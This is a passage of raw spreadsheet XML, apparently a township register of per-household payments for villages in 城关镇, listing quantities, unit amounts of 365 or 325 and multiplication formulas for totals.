      </c>
      <c r="E506" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F506" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G506" s="17">
        <v>1</v>
      </c>
      <c r="H506" s="18">
        <v>365</v>
      </c>
      <c r="I506" s="17">
        <f t="shared" ref="I506:I521" si="21">H506*G506</f>
        <v>365</v>
      </c>
      <c r="J506" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K506" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="507" customHeight="1" spans="1:11">
      <c r="A507" s="16" t="s">
        <v>1434</v>
      </c>
      <c r="B507" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C507" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D507" s="17" t="s">
        <v>1435</v>
      </c>
      <c r="E507" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F507" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G507" s="17">
        <v>1</v>
      </c>
      <c r="H507" s="18">
        <v>365</v>
      </c>
      <c r="I507" s="17">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J507" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K507" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="508" customHeight="1" spans="1:11">
      <c r="A508" s="16" t="s">
        <v>1436</v>
      </c>
      <c r="B508" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C508" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D508" s="17" t="s">
        <v>1437</v>
      </c>
      <c r="E508" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F508" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G508" s="17">
        <v>1</v>
      </c>
      <c r="H508" s="18">
        <v>365</v>
      </c>
      <c r="I508" s="17">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J508" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K508" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="509" customHeight="1" spans="1:11">
      <c r="A509" s="16" t="s">
        <v>1438</v>
      </c>
      <c r="B509" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C509" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D509" s="17" t="s">
        <v>1439</v>
      </c>
      <c r="E509" s="17" t="s">
        <v>258</v>
      </c>
      <c r="F509" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G509" s="17">
        <v>1</v>
      </c>
      <c r="H509" s="18">
        <v>365</v>
      </c>
      <c r="I509" s="17">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J509" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K509" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="510" customHeight="1" spans="1:11">
      <c r="A510" s="16" t="s">
        <v>1440</v>
      </c>
      <c r="B510" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C510" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D510" s="17" t="s">
        <v>1441</v>
      </c>
      <c r="E510" s="17" t="s">
        <v>258</v>
      </c>
      <c r="F510" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G510" s="17">
        <v>1</v>
      </c>
      <c r="H510" s="18">
        <v>365</v>
      </c>
      <c r="I510" s="17">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J510" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K510" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="511" customHeight="1" spans="1:11">
      <c r="A511" s="16" t="s">
        <v>1442</v>
      </c>
      <c r="B511" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C511" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D511" s="17" t="s">
        <v>1443</v>
      </c>
      <c r="E511" s="17" t="s">
        <v>416</v>
      </c>
      <c r="F511" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G511" s="17">
        <v>1</v>
      </c>
      <c r="H511" s="18">
        <v>365</v>
      </c>
      <c r="I511" s="17">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J511" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K511" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="512" customHeight="1" spans="1:11">
      <c r="A512" s="16" t="s">
        <v>1444</v>
      </c>
      <c r="B512" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C512" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D512" s="17" t="s">
        <v>1445</v>
      </c>
      <c r="E512" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F512" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G512" s="17">
        <v>1</v>
      </c>
      <c r="H512" s="18">
        <v>365</v>
      </c>
      <c r="I512" s="17">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J512" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K512" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="513" customHeight="1" spans="1:11">
      <c r="A513" s="16" t="s">
        <v>1446</v>
      </c>
      <c r="B513" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C513" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D513" s="17" t="s">
        <v>1447</v>
      </c>
      <c r="E513" s="17" t="s">
        <v>923</v>
      </c>
      <c r="F513" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G513" s="17">
        <v>2</v>
      </c>
      <c r="H513" s="18">
        <v>325</v>
      </c>
      <c r="I513" s="17">
        <f t="shared" si="21"/>
        <v>650</v>
      </c>
      <c r="J513" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K513" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="514" customHeight="1" spans="1:11">
      <c r="A514" s="16" t="s">
        <v>1448</v>
      </c>
      <c r="B514" s="17" t="str">
        <f>B513</f>
        <v>城关镇</v>
      </c>
      <c r="C514" s="17" t="str">
        <f>C513</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D514" s="16" t="s">
        <v>1449</v>
      </c>
      <c r="E514" s="16" t="s">
        <v>542</v>
      </c>
      <c r="F514" s="17" t="str">
        <f>F513</f>
        <v>4113210106</v>
      </c>
      <c r="G514" s="17"/>
      <c r="H514" s="17"/>
      <c r="I514" s="17"/>
      <c r="J514" s="17"/>
      <c r="K514" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="515" customHeight="1" spans="1:11">
      <c r="A515" s="16" t="s">
        <v>1450</v>
      </c>
      <c r="B515" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C515" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D515" s="17" t="s">
        <v>1451</v>
      </c>
      <c r="E515" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F515" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G515" s="17">
        <v>1</v>
      </c>
      <c r="H515" s="18">
        <v>365</v>
      </c>
      <c r="I515" s="17">
        <f>H515*G515</f>
        <v>365</v>
      </c>
      <c r="J515" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K515" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="516" customHeight="1" spans="1:11">
      <c r="A516" s="16" t="s">
        <v>1452</v>
      </c>
      <c r="B516" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C516" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D516" s="17" t="s">
        <v>1453</v>
      </c>
      <c r="E516" s="17" t="s">
        <v>1454</v>
      </c>
      <c r="F516" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G516" s="17">
        <v>1</v>
      </c>
      <c r="H516" s="18">
        <v>365</v>
      </c>
      <c r="I516" s="17">
        <f>H516*G516</f>
        <v>365</v>
      </c>
      <c r="J516" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K516" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="517" customHeight="1" spans="1:11">
      <c r="A517" s="16" t="s">
        <v>1455</v>
      </c>
      <c r="B517" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C517" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D517" s="17" t="s">
        <v>1456</v>
      </c>
      <c r="E517" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F517" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G517" s="17">
        <v>1</v>
      </c>
      <c r="H517" s="18">
        <v>365</v>
      </c>
      <c r="I517" s="17">
        <f>H517*G517</f>
        <v>365</v>
      </c>
      <c r="J517" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K517" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="518" customHeight="1" spans="1:11">
      <c r="A518" s="16" t="s">
        <v>1457</v>
      </c>
      <c r="B518" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C518" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D518" s="17" t="s">
        <v>1458</v>
      </c>
      <c r="E518" s="17" t="s">
        <v>1077</v>
      </c>
      <c r="F518" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G518" s="17">
        <v>2</v>
      </c>
      <c r="H518" s="18">
        <v>325</v>
      </c>
      <c r="I518" s="17">
        <f>H518*G518</f>
        <v>650</v>
      </c>
      <c r="J518" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K518" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="519" customHeight="1" spans="1:11">
      <c r="A519" s="16" t="s">
        <v>1459</v>
      </c>
      <c r="B519" s="17" t="str">
        <f>B518</f>
        <v>城关镇</v>
      </c>
      <c r="C519" s="17" t="str">
        <f>C518</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D519" s="17" t="s">
        <v>1460</v>
      </c>
      <c r="E519" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F519" s="17" t="str">
        <f>F518</f>
        <v>4113210103</v>
      </c>
      <c r="G519" s="17"/>
      <c r="H519" s="17"/>
      <c r="I519" s="17"/>
      <c r="J519" s="17"/>
      <c r="K519" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="520" customHeight="1" spans="1:11">
      <c r="A520" s="16" t="s">
        <v>1461</v>
      </c>
      <c r="B520" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C520" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D520" s="17" t="s">
        <v>1462</v>
      </c>
      <c r="E520" s="17" t="s">
        <v>435</v>
      </c>
      <c r="F520" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G520" s="17">
        <v>1</v>
      </c>
      <c r="H520" s="18">
        <v>365</v>
      </c>
      <c r="I520" s="17">
        <f>H520*G520</f>
        <v>365</v>
      </c>
      <c r="J520" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K520" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="521" customHeight="1" spans="1:11">
      <c r="A521" s="16" t="s">
        <v>1463</v>
      </c>
      <c r="B521" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C521" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D521" s="17" t="s">
        <v>1464</v>
      </c>
      <c r="E521" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F521" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G521" s="17">
        <v>1</v>
      </c>
      <c r="H521" s="18">
        <v>365</v>
      </c>
      <c r="I521" s="17">
        <f>H521*G521</f>
        <v>365</v>
      </c>
      <c r="J521" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K521" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="522" customHeight="1" spans="1:11">
      <c r="A522" s="16" t="s">
        <v>1465</v>
      </c>
      <c r="B522" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C522" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D522" s="17" t="s">
        <v>1466</v>
      </c>
      <c r="E522" s="17" t="s">
        <v>1467</v>
      </c>
      <c r="F522" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G522" s="17">
        <v>1</v>
      </c>
      <c r="H522" s="18">
        <v>365</v>
      </c>
      <c r="I522" s="17">
        <f>H522*G522</f>
        <v>365</v>
      </c>
      <c r="J522" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K522" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="523" customHeight="1" spans="1:11">
      <c r="A523" s="16" t="s">
        <v>1468</v>
      </c>
      <c r="B523" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C523" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D523" s="17" t="s">
        <v>1469</v>
      </c>
      <c r="E523" s="17" t="s">
        <v>1470</v>
      </c>
      <c r="F523" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G523" s="17">
        <v>1</v>
      </c>
      <c r="H523" s="18">
        <v>365</v>
      </c>
      <c r="I523" s="17">
        <f>H523*G523</f>
        <v>365</v>
      </c>
      <c r="J523" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K523" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="524" customHeight="1" spans="1:11">
      <c r="A524" s="16" t="s">
        <v>1471</v>
      </c>
      <c r="B524" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C524" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D524" s="17" t="s">
        <v>1472</v>
      </c>
      <c r="E524" s="17" t="s">
        <v>1473</v>
      </c>
      <c r="F524" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G524" s="17">
        <v>2</v>
      </c>
      <c r="H524" s="18">
        <v>325</v>
      </c>
      <c r="I524" s="17">
        <f>H524*G524</f>
        <v>650</v>
      </c>
      <c r="J524" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K524" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="525" customHeight="1" spans="1:11">
      <c r="A525" s="16" t="s">
        <v>1474</v>
      </c>
      <c r="B525" s="17" t="str">
        <f>B524</f>
        <v>城关镇</v>
      </c>
      <c r="C525" s="17" t="str">
        <f>C524</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D525" s="16" t="s">
        <v>1475</v>
      </c>
      <c r="E525" s="16" t="s">
        <v>249</v>
      </c>
      <c r="F525" s="17" t="str">
        <f>F524</f>
        <v>4113210108</v>
      </c>
      <c r="G525" s="17"/>
      <c r="H525" s="17"/>
      <c r="I525" s="17"/>
      <c r="J525" s="17"/>
      <c r="K525" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="526" customHeight="1" spans="1:11">
      <c r="A526" s="16" t="s">
        <v>1476</v>
      </c>
      <c r="B526" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C526" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D526" s="17" t="s">
        <v>1477</v>
      </c>
      <c r="E526" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F526" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G526" s="17">
        <v>1</v>
      </c>
      <c r="H526" s="18">
        <v>365</v>
      </c>
      <c r="I526" s="17">
        <f>H526*G526</f>
        <v>365</v>
      </c>
      <c r="J526" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K526" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="527" customHeight="1" spans="1:11">
      <c r="A527" s="16" t="s">
        <v>1478</v>
      </c>
      <c r="B527" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C527" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D527" s="17" t="s">
        <v>1479</v>
      </c>
      <c r="E527" s="17" t="s">
        <v>1480</v>
      </c>
      <c r="F527" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G527" s="17">
        <v>1</v>
      </c>
      <c r="H527" s="18">
        <v>365</v>
      </c>
      <c r="I527" s="17">
        <f>H527*G527</f>
        <v>365</v>
      </c>
      <c r="J527" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K527" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="528" customHeight="1" spans="1:11">
      <c r="A528" s="16" t="s">
        <v>1481</v>
      </c>
      <c r="B528" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C528" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D528" s="17" t="s">
        <v>1482</v>
      </c>
      <c r="E528" s="17" t="s">
        <v>402</v>
      </c>
      <c r="F528" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G528" s="17">
        <v>1</v>
      </c>
      <c r="H528" s="18">
        <v>365</v>
      </c>
      <c r="I528" s="17">
        <f>H528*G528</f>
        <v>365</v>
      </c>
      <c r="J528" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K528" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="529" customHeight="1" spans="1:11">
      <c r="A529" s="16" t="s">
        <v>1483</v>
      </c>
      <c r="B529" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C529" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D529" s="17" t="s">
        <v>1484</v>
      </c>
      <c r="E529" s="17" t="s">
        <v>1485</v>
      </c>
      <c r="F529" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G529" s="17">
        <v>1</v>
      </c>
      <c r="H529" s="18">
        <v>365</v>
      </c>
      <c r="I529" s="17">
        <f>H529*G529</f>
        <v>365</v>
      </c>
      <c r="J529" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K529" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="530" customHeight="1" spans="1:11">
      <c r="A530" s="16" t="s">
        <v>1486</v>
      </c>
      <c r="B530" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C530" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D530" s="17" t="s">
        <v>1487</v>
      </c>
      <c r="E530" s="17" t="s">
        <v>1488</v>
      </c>
      <c r="F530" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G530" s="17">
        <v>2</v>
      </c>
      <c r="H530" s="18">
        <v>365</v>
      </c>
      <c r="I530" s="17">
        <f>H530*G530</f>
        <v>730</v>
      </c>
      <c r="J530" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K530" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="531" customHeight="1" spans="1:11">
      <c r="A531" s="16" t="s">
        <v>1489</v>
      </c>
      <c r="B531" s="17" t="str">
        <f>B530</f>
        <v>城关镇</v>
      </c>
      <c r="C531" s="17" t="str">
        <f>C530</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D531" s="20" t="s">
        <v>1490</v>
      </c>
      <c r="E531" s="20" t="s">
        <v>340</v>
      </c>
      <c r="F531" s="17" t="str">
        <f>F530</f>
        <v>4113210108</v>
      </c>
      <c r="G531" s="17"/>
      <c r="H531" s="17"/>
      <c r="I531" s="17"/>
      <c r="J531" s="17"/>
      <c r="K531" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="532" customHeight="1" spans="1:11">
      <c r="A532" s="16" t="s">
        <v>1491</v>
      </c>
      <c r="B532" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C532" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D532" s="17" t="s">
        <v>1492</v>
      </c>
      <c r="E532" s="17" t="s">
        <v>966</v>
      </c>
      <c r="F532" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G532" s="17">
        <v>2</v>
      </c>
      <c r="H532" s="18">
        <v>325</v>
      </c>
      <c r="I532" s="17">
        <f>H532*G532</f>
        <v>650</v>
      </c>
      <c r="J532" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K532" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="533" customHeight="1" spans="1:11">
      <c r="A533" s="16" t="s">
        <v>1493</v>
      </c>
      <c r="B533" s="17" t="str">
        <f>B532</f>
        <v>城关镇</v>
      </c>
      <c r="C533" s="17" t="str">
        <f>C532</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D533" s="16" t="s">
        <v>1494</v>
      </c>
      <c r="E533" s="16" t="s">
        <v>1495</v>
      </c>
      <c r="F533" s="17" t="str">
        <f>F532</f>
        <v>4113210103</v>
      </c>
      <c r="G533" s="17"/>
      <c r="H533" s="17"/>
      <c r="I533" s="17"/>
      <c r="J533" s="17"/>
      <c r="K533" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="534" customHeight="1" spans="1:11">
      <c r="A534" s="16" t="s">
        <v>1496</v>
      </c>
      <c r="B534" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C534" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D534" s="17" t="s">
        <v>1497</v>
      </c>
      <c r="E534" s="17" t="s">
        <v>1498</v>
      </c>
      <c r="F534" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G534" s="17">
        <v>1</v>
      </c>
      <c r="H534" s="18">
        <v>365</v>
      </c>
      <c r="I534" s="17">
        <f t="shared" ref="I534:I540" si="22">H534*G534</f>
        <v>365</v>
      </c>
      <c r="J534" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K534" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="535" customHeight="1" spans="1:11">
      <c r="A535" s="16" t="s">
        <v>1499</v>
      </c>
      <c r="B535" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C535" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D535" s="17" t="s">
        <v>1500</v>
      </c>
      <c r="E535" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F535" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G535" s="17">
        <v>1</v>
      </c>
      <c r="H535" s="18">
        <v>365</v>
      </c>
      <c r="I535" s="17">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J535" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K535" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="536" customHeight="1" spans="1:11">
      <c r="A536" s="16" t="s">
        <v>1501</v>
      </c>
      <c r="B536" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C536" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D536" s="17" t="s">
        <v>1502</v>
      </c>
      <c r="E536" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F536" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G536" s="17">
        <v>1</v>
      </c>
      <c r="H536" s="18">
        <v>365</v>
      </c>
      <c r="I536" s="17">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J536" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K536" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="537" customHeight="1" spans="1:11">
      <c r="A537" s="16" t="s">
        <v>1503</v>
      </c>
      <c r="B537" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C537" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D537" s="17" t="s">
        <v>1504</v>
      </c>
      <c r="E537" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F537" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G537" s="17">
        <v>1</v>
      </c>
      <c r="H537" s="18">
        <v>365</v>
      </c>
      <c r="I537" s="17">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J537" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K537" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="538" customHeight="1" spans="1:11">
      <c r="A538" s="16" t="s">
        <v>1505</v>
      </c>
      <c r="B538" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C538" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D538" s="17" t="s">
        <v>1506</v>
      </c>
      <c r="E538" s="17" t="s">
        <v>389</v>
      </c>
      <c r="F538" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G538" s="17">
        <v>1</v>
      </c>
      <c r="H538" s="18">
        <v>365</v>
      </c>
      <c r="I538" s="17">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J538" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K538" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="539" customHeight="1" spans="1:11">
      <c r="A539" s="16" t="s">
        <v>1507</v>
      </c>
      <c r="B539" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C539" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D539" s="17" t="s">
        <v>1508</v>
      </c>
      <c r="E539" s="17" t="s">
        <v>1509</v>
      </c>
      <c r="F539" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G539" s="17">
        <v>1</v>
      </c>
      <c r="H539" s="18">
        <v>365</v>
      </c>
      <c r="I539" s="17">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J539" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K539" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="540" customHeight="1" spans="1:11">
      <c r="A540" s="16" t="s">
        <v>1510</v>
      </c>
      <c r="B540" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C540" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D540" s="17" t="s">
        <v>1511</v>
      </c>
      <c r="E540" s="17" t="s">
        <v>1512</v>
      </c>
      <c r="F540" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G540" s="17">
        <v>2</v>
      </c>
      <c r="H540" s="18">
        <v>325</v>
      </c>
      <c r="I540" s="17">
        <f t="shared" si="22"/>
        <v>650</v>
      </c>
      <c r="J540" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K540" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="541" customHeight="1" spans="1:11">
      <c r="A541" s="16" t="s">
        <v>1513</v>
      </c>
      <c r="B541" s="17" t="str">
        <f>B540</f>
        <v>城关镇</v>
      </c>
      <c r="C541" s="17" t="str">
        <f>C540</f>
        <v>东北村</v>
      </c>
      <c r="D541" s="16" t="s">
        <v>1514</v>
      </c>
      <c r="E541" s="16" t="s">
        <v>481</v>
      </c>
      <c r="F541" s="17" t="str">
        <f>F540</f>
        <v>4113210103</v>
      </c>
      <c r="G541" s="17"/>
      <c r="H541" s="17"/>
      <c r="I541" s="17"/>
      <c r="J541" s="17"/>
      <c r="K541" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="542" customHeight="1" spans="1:11">
      <c r="A542" s="16" t="s">
        <v>1515</v>
      </c>
      <c r="B542" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C542" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D542" s="17" t="s">
        <v>1516</v>
      </c>
      <c r="E542" s="17" t="s">
        <v>1517</v>
      </c>
      <c r="F542" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G542" s="17">
        <v>2</v>
      </c>
      <c r="H542" s="18">
        <v>325</v>
      </c>
      <c r="I542" s="17">
        <f>H542*G542</f>
        <v>650</v>
      </c>
      <c r="J542" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K542" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="543" customHeight="1" spans="1:11">
      <c r="A543" s="16" t="s">
        <v>1518</v>
      </c>
      <c r="B543" s="17" t="str">
        <f>B542</f>
        <v>城关镇</v>
      </c>
      <c r="C543" s="17" t="str">
        <f>C542</f>
        <v>中华村</v>
      </c>
      <c r="D543" s="16" t="s">
        <v>1519</v>
      </c>
      <c r="E543" s="16" t="s">
        <v>1366</v>
      </c>
      <c r="F543" s="17" t="str">
        <f>F542</f>
        <v>4113210108</v>
      </c>
      <c r="G543" s="17"/>
      <c r="H543" s="17"/>
      <c r="I543" s="17"/>
      <c r="J543" s="17"/>
      <c r="K543" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="544" customHeight="1" spans="1:11">
      <c r="A544" s="16" t="s">
        <v>1520</v>
      </c>
      <c r="B544" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C544" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D544" s="17" t="s">
        <v>1521</v>
      </c>
      <c r="E544" s="17" t="s">
        <v>1522</v>
      </c>
      <c r="F544" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G544" s="17">
        <v>1</v>
      </c>
      <c r="H544" s="18">
        <v>365</v>
      </c>
      <c r="I544" s="17">
        <f>H544*G544</f>
        <v>365</v>
      </c>
      <c r="J544" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K544" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="545" customHeight="1" spans="1:11">
      <c r="A545" s="16" t="s">
        <v>1523</v>
      </c>
      <c r="B545" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C545" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D545" s="17" t="s">
        <v>1524</v>
      </c>
      <c r="E545" s="17" t="s">
        <v>542</v>
      </c>
      <c r="F545" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G545" s="17">
        <v>1</v>
      </c>
      <c r="H545" s="18">
        <v>365</v>
      </c>
      <c r="I545" s="17">
        <f>H545*G545</f>
        <v>365</v>
      </c>
      <c r="J545" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K545" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="546" customHeight="1" spans="1:11">
      <c r="A546" s="16" t="s">
        <v>1525</v>
      </c>
      <c r="B546" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C546" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D546" s="17" t="s">
        <v>1526</v>
      </c>
      <c r="E546" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F546" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G546" s="17">
        <v>2</v>
      </c>
      <c r="H546" s="18">
        <v>325</v>
      </c>
      <c r="I546" s="17">
        <f>H546*G546</f>
        <v>650</v>
      </c>
      <c r="J546" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K546" s="17" t="s">
        <v>225</v>
      </c>
